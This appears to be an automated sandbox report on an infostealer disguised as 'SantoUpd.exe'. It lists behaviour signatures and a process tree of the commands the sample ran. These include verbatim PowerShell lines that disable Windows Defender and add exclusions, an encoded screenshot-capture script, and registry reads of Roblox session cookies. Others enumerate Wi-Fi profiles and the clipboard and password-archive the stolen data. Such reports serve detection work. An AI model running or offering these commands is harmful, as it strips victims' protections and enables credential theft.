Analysis

  • max time kernel
    95s
  • max time network
    205s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-11-2024 23:03

General

  • Target

    SantoWareUpd1.0/SantoUpd.exe

  • Size

    8.0MB

  • MD5

    a0763ede2bcc1d5eb84be1075685a2bb

  • SHA1

    c0d49d87ca2a4ba8596e7dafd13f1368204368d6

  • SHA256

    779060a795c59ca22650a99ea748388c86113999744be684e4142fe443fd3b87

  • SHA512

    2bb354c6aeb21d8ed535406251bbbc0a9d03cf9e42aa72ca5dec9a580aa1340f672f051687336ed3de8807c9680ff61a72b1bb3398abb784ea232bcb8d848df8

  • SSDEEP

    196608:8h8P5IGLjv+bhqNVoB0SEsucQZ41JBbIEs1Lx:w8Pi6L+9qz80SJHQK1J9shx

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • UPX packed file 62 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SantoWareUpd1.0\SantoUpd.exe
    "C:\Users\Admin\AppData\Local\Temp\SantoWareUpd1.0\SantoUpd.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1996
    • C:\Users\Admin\AppData\Local\Temp\SantoWareUpd1.0\SantoUpd.exe
      "C:\Users\Admin\AppData\Local\Temp\SantoWareUpd1.0\SantoUpd.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4384
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SantoWareUpd1.0\SantoUpd.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4740
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SantoWareUpd1.0\SantoUpd.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3640
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2968
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3980
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4220
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2888
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3964
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:5016
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2668
        • C:\Windows\system32\reg.exe
          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
          4⤵
            PID:4236
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1748
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
            4⤵
              PID:4312
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1180
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              • Suspicious use of AdjustPrivilegeToken
              PID:4420
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2964
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:4704
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎    .scr'"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1868
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎    .scr'
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:5060
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:464
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:5112
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1504
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:1124
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2572
            • C:\Windows\System32\Wbem\WMIC.exe
              WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              4⤵
                PID:3468
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              3⤵
              • Clipboard Data
              PID:1892
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Get-Clipboard
                4⤵
                • Clipboard Data
                • Suspicious behavior: EnumeratesProcesses
                PID:2368
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
                PID:1212
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  4⤵
                  • Enumerates processes with tasklist
                  PID:4884
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                  PID:2616
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:2476
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                    3⤵
                    • System Network Configuration Discovery: Wi-Fi Discovery
                    PID:2360
                    • C:\Windows\system32\netsh.exe
                      netsh wlan show profile
                      4⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Network Configuration Discovery: Wi-Fi Discovery
                      PID:2888
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "systeminfo"
                    3⤵
                      PID:1080
                      • C:\Windows\system32\systeminfo.exe
                        systeminfo
                        4⤵
                        • Gathers system information
                        PID:764
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                      3⤵
                        PID:3176
                        • C:\Windows\system32\reg.exe
                          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                          4⤵
                            PID:4220
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                          3⤵
                            PID:4404
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                              4⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:3644
                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3w35u4cl\3w35u4cl.cmdline"
                                5⤵
                                  PID:2956
                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA4AC.tmp" "c:\Users\Admin\AppData\Local\Temp\3w35u4cl\CSC901D7584EC964C089EBA9D15C6B0BC1D.TMP"
                                    6⤵
                                      PID:1116
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                3⤵
                                  PID:2848
                                  • C:\Windows\System32\Conhost.exe
                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    4⤵
                                      PID:1180
                                    • C:\Windows\system32\attrib.exe
                                      attrib -r C:\Windows\System32\drivers\etc\hosts
                                      4⤵
                                      • Drops file in Drivers directory
                                      • Views/modifies file attributes
                                      PID:3172
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    3⤵
                                      PID:3456
                                      • C:\Windows\system32\tree.com
                                        tree /A /F
                                        4⤵
                                          PID:3824
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                        3⤵
                                          PID:404
                                          • C:\Windows\system32\attrib.exe
                                            attrib +r C:\Windows\System32\drivers\etc\hosts
                                            4⤵
                                            • Drops file in Drivers directory
                                            • Views/modifies file attributes
                                            PID:2208
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          3⤵
                                            PID:4392
                                            • C:\Windows\system32\tree.com
                                              tree /A /F
                                              4⤵
                                                PID:5072
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                              3⤵
                                                PID:4756
                                                • C:\Windows\system32\tasklist.exe
                                                  tasklist /FO LIST
                                                  4⤵
                                                  • Enumerates processes with tasklist
                                                  PID:4220
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                3⤵
                                                  PID:4504
                                                  • C:\Windows\system32\tree.com
                                                    tree /A /F
                                                    4⤵
                                                      PID:388
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                    3⤵
                                                      PID:4932
                                                      • C:\Windows\system32\tree.com
                                                        tree /A /F
                                                        4⤵
                                                          PID:4060
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                        3⤵
                                                          PID:1436
                                                          • C:\Windows\system32\tree.com
                                                            tree /A /F
                                                            4⤵
                                                              PID:2572
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                            3⤵
                                                              PID:1872
                                                              • C:\Windows\System32\Conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                4⤵
                                                                  PID:2208
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                  4⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:948
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                3⤵
                                                                  PID:5072
                                                                  • C:\Windows\System32\Conhost.exe
                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    4⤵
                                                                      PID:1892
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                      4⤵
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:3120
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "getmac"
                                                                    3⤵
                                                                      PID:4936
                                                                      • C:\Windows\system32\getmac.exe
                                                                        getmac
                                                                        4⤵
                                                                          PID:2476
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI19962\rar.exe a -r -hp"mako321" "C:\Users\Admin\AppData\Local\Temp\awBH5.zip" *"
                                                                        3⤵
                                                                          PID:4476
                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI19962\rar.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\_MEI19962\rar.exe a -r -hp"mako321" "C:\Users\Admin\AppData\Local\Temp\awBH5.zip" *
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            PID:1680
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                          3⤵
                                                                            PID:4404
